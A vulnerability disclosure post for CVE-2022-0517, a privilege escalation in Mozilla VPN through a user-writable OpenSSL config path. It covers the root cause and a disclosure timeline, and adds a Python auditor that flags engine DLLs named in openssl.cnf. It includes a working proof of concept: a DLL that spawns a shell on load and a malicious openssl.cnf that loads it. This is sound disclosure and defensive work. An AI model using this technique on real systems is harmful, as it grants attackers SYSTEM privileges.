
[0-Day] CVE-2022-0517 - Mozilla VPN Privilege Escalation Vulnerability

by l33d0hyun 2022. 4. 30.
Mozilla VPN

Title

  • Mozilla VPN Privilege Escalation Vulnerability

Summary

  • An Uncontrolled Search Path Element vulnerability exists in libcrypto-1_1-x64.dll.
  • An attacker can place a crafted openssl.cnf file in C:\MozillaVPNBuild\SSL to exploit this vulnerability.

Security Severity

  • High

Root Cause Analysis

  • The following call stack shows the logic that loads the openssl.cnf file:

```
libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x109195 => 0x1801a6eb5
libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x3b9ce  => 0x1800d96ee
libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x6f360  => 0x18010d080
libcrypto-1_1-x64.dll CRYPTO_memcmp + 0x7278a  => 0x1801104aa
```

  • Check the OpenSSL_version_0 function (decompiled):

```c
const char *__fastcall OpenSSL_version_0(int a1)
{
  const char *result; // rax

  switch ( a1 )
  {
    case 0:
      result = "OpenSSL 1.1.1l 24 Aug 2021";
      break;
    case 1:
      result = "compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DO"
               "PENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -"
               "DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_"
               "ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM";
      break;
    case 2:
      result = "built on: Wed Nov 10 14:26:07 2021 UTC";
      break;
    case 3:
      result = "platform: VC-WIN64A";
      break;
    case 4:
      result = "OPENSSLDIR: \"C:\\MozillaVPNBuild\\SSL\"";
      break;
    case 5:
      result = "ENGINESDIR: \"C:\\MozillaVPNBuild\\lib\\engines-1_1\"";
      break;
    default:
      result = "not available";
      break;
  }
  return result;
}
```

  • Looking at OPENSSLDIR, openssl.cnf is loaded from a directory that regular users have write access to. Because the library runs inside the VPN service, the file is processed with SYSTEM privileges. Importantly, an openssl.cnf file can instruct OpenSSL to load additional DLLs (dynamic engines), which leads to Privilege Escalation.

Proof-of-Concept

  • poc.c

```c
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Payload executed when the DLL is loaded: spawns a shell in the loading process. */
void exploit()
{
    system("cmd");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        exploit();
        break;
    }
    return TRUE;
}
```

  • openssl.cnf

```
# Malicious openssl.cnf
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
cmd = cmd_section

[cmd_section]
engine_id = cmd
dynamic_path = C:\\MozillaVPNBuild\\SSL\\poc.dll
init = 0
```
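As an added defender-side check (not part of the original post), the following Python parser walks the same configuration chain described in the root cause and PoC sections, `openssl_conf` -> `engines` -> engine section -> `dynamic_path`, and reports every DLL an openssl.cnf would load as a dynamic engine. The sample config is constructed to mirror the PoC layout; it is not taken from a real host.

```python
"""Audit an openssl.cnf for dynamic engine DLLs it would load."""
import re
from typing import Dict, List

# OpenSSL CONF syntax: [section] headers and key = value pairs, '#' comments
SECTION_RE = re.compile(r"^\s*\[\s*([^\]]+?)\s*\]\s*$")
KEY_RE = re.compile(r"^\s*([^=#\s]+)\s*=\s*(.*?)\s*$")


def parse_openssl_cnf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse into {section: {key: value}}; keys before any header go to 'default'."""
    sections: Dict[str, Dict[str, str]] = {"default": {}}
    current = "default"
    for line in text.splitlines():
        line = line.split("#", 1)[0]  # drop comments
        if not line.strip():
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            sections.setdefault(current, {})
            continue
        m = KEY_RE.match(line)
        if m:
            sections[current][m.group(1)] = m.group(2)
    return sections


def engine_dll_paths(text: str) -> List[str]:
    """Return dynamic_path values reachable from openssl_conf (the engine-load chain)."""
    conf = parse_openssl_cnf(text)
    init_name = conf["default"].get("openssl_conf")
    engines_name = conf.get(init_name or "", {}).get("engines")
    if not engines_name:
        return []
    paths: List[str] = []
    for _engine_id, eng_section in conf.get(engines_name, {}).items():
        dll = conf.get(eng_section, {}).get("dynamic_path")
        if dll:
            paths.append(dll)
    return paths


# Constructed sample mirroring the PoC layout (not a real file from a host)
SAMPLE_CNF = r"""
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
cmd = cmd_section
[cmd_section]
engine_id = cmd
dynamic_path = C:\\MozillaVPNBuild\\SSL\\poc.dll
init = 0
"""
```

Any non-empty result for a config in a user-writable OPENSSLDIR is worth an alert; a benign config with no `engines` entry yields an empty list.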

CREDIT Information

  • DoHyun Lee (@l33d0hyun) of DNSLab, Korea University

Patch & Release

Timeline

  • 2022-01-27 : Vendor Report
  • 2022-01-31 : Vendor Assigned
  • 2022-02-02 : Vendor Investigated
  • 2022-02-16 : Fixed
  • 2022-02-22 : Bounty Accepted
  • 2022-02-23 : Published
